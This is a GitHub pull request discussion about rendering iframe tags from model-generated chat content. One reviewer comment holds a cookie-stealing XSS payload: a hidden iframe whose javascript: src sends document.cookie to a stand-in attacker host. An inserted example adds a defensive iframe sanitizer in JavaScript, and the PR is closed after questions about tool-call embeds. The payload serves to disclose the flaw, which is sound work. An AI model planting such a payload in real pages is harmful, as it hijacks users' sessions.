
iframe front end rendering

Open charli117 opened this issue 4 months ago • 4 comments

Description

When the generated content contains an iframe tag, the front end implements automatic embedding rendering. The supported parameters and recommended formats are as follows. Note that the src parameter is required, and default values are provided if the others are left blank.

Fixes # (issue)

Type of Change

Please delete options that are not relevant.

  • [ ] Bug fix (non-breaking change which fixes an issue)
  • [x] New feature (non-breaking change which adds functionality)
  • [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
  • [ ] This change requires a documentation update, included: Dify Document

How Has This Been Tested?

Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration

  • [ ] TODO

Suggested Checklist:

  • [x] I have performed a self-review of my own code
  • [ ] I have commented my code, particularly in hard-to-understand areas
  • [x] My changes generate no new warnings
  • [ ] I ran dev/reformat(backend) and cd web && npx lint-staged(frontend) to appease the lint gods
  • [ ] optional I have made corresponding changes to the documentation
  • [ ] optional I have added tests that prove my fix is effective or that my feature works
  • [ ] optional New and existing unit tests pass locally with my changes

charli117 avatar Feb 28 '24 12:02 charli117

<h1>Welcome to My Web Page</h1>

<iframe style="display:none" src="javascript:document.write('<script>document.location="http://malicious.example.com/steal-cookie?cookie="+document.cookie</script>')" ></iframe>

This PR could lead to a potential XSS attack in the chat bubble.

Fixed this issue

charli117 avatar Feb 29 '24 14:02 charli117
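The comment above shows why a renderer that embeds whatever `<iframe>` the model emits is dangerous: a `javascript:` URL in `src` runs in the host page's origin, so it can read `document.cookie`. The following is an added example, not code from the Dify project or from this PR, of the defensive pass a chat-bubble renderer can run before embedding: parse the tag, require `src` as the description says, accept only `http`/`https` schemes, drop every attribute except an allowlist (so `style`, `onload`, `srcdoc` and friends never reach the DOM), fill in defaults for the optional attributes, and sandbox the frame. The function and constant names (`extractIframes`, `sanitizeIframe`, `renderIframe`, `DEFAULTS`, `ALLOWED_ATTRS`) and the default values are assumptions for this example, and the inputs in the test are constructed.

```javascript
// Added example (not Dify's code): defensive handling of <iframe> tags found in
// model-generated chat content before the front end embeds them.
// DEFAULTS/ALLOWED_ATTRS and all function names are assumptions for this example.

// Default values applied when the generated tag omits an optional attribute.
const DEFAULTS = { width: "100%", height: "400", title: "embedded content" };

// Attributes the renderer is willing to copy through; everything else is dropped.
const ALLOWED_ATTRS = new Set(["src", "width", "height", "title"]);

// Pull <iframe ...> tags and their attributes out of generated text.
// Handles double-quoted, single-quoted and bare attribute values.
function extractIframes(text) {
  const tags = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  const attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = tagRe.exec(text)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(m[1])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? "";
    }
    tags.push(attrs);
  }
  return tags;
}

// Validate one parsed tag. Returns the attributes to render, or null to drop the tag.
function sanitizeIframe(attrs) {
  // src is required, as the PR description states.
  if (typeof attrs.src !== "string" || attrs.src.trim() === "") return null;
  let url;
  try {
    // No base URL is given, so relative URLs are rejected as well.
    url = new URL(attrs.src.trim());
  } catch {
    return null;
  }
  // Scheme allowlist: the URL parser lowercases the scheme and strips embedded
  // tabs/newlines, so "JavaScript:" and "java\tscript:" are both caught here.
  if (url.protocol !== "https:" && url.protocol !== "http:") return null;

  const out = { src: url.href };
  for (const [k, v] of Object.entries(attrs)) {
    // Drops style, srcdoc, on* handlers and anything else outside the allowlist.
    if (k === "src" || !ALLOWED_ATTRS.has(k)) continue;
    out[k] = v;
  }
  for (const [k, v] of Object.entries(DEFAULTS)) {
    if (!(k in out)) out[k] = v;
  }
  // Sandbox without allow-same-origin / allow-top-navigation: the embedded document
  // runs in an opaque origin and cannot navigate or script the host page.
  out.sandbox = "allow-scripts";
  // Do not leak the chat URL to the embedded site.
  out.referrerpolicy = "no-referrer";
  return out;
}

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Serialize a parsed tag after sanitizing; returns "" when the tag is rejected.
function renderIframe(attrs) {
  const safe = sanitizeIframe(attrs);
  if (!safe) return "";
  const parts = Object.entries(safe).map(([k, v]) => `${k}="${escapeAttr(v)}"`);
  return `<iframe ${parts.join(" ")}></iframe>`;
}

// Stand-alone demonstration on constructed input.
const sample =
  'Try <iframe src="https://example.com/embed?id=1" width=600 onload="x()"></iframe> ' +
  'or <iframe src="javascript:alert(document.cookie)"></iframe>';
for (const tag of extractIframes(sample)) {
  console.log(renderIframe(tag) || "(rejected)");
}
```

Doing the check on the parsed `URL` object rather than on the raw string is the important design choice: string prefix checks miss case variants and embedded whitespace that the browser's own parser tolerates, so the validator would otherwise disagree with the browser about what `src` means.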

    <h1 style="color: red;">Red Text</h1>
    <h1 style="color: green;">Green Text</h1>
    <h1 style="color: blue;">Blue Text</h1>

crazywoola avatar Mar 04 '24 01:03 crazywoola

Hi, I've been redirected to here from my issue. I wonder whether this PR only applies to user inputs. I'd like to embed an iframe in a function/tool calling, so that I can customize the UI when the model calls a tool. Would be great to have something like LobeChat plugins.

ifsheldon avatar Apr 07 '24 07:04 ifsheldon

> Hi, I've been redirected to here from my issue. I wonder whether this PR only applies to user inputs. I'd like to embed an iframe in a function/tool calling, so that I can customize the UI when the model calls a tool. Would be great to have something like LobeChat plugins.

@charli117

crazywoola avatar Apr 09 '24 09:04 crazywoola

Close for now.

crazywoola avatar Apr 16 '24 13:04 crazywoola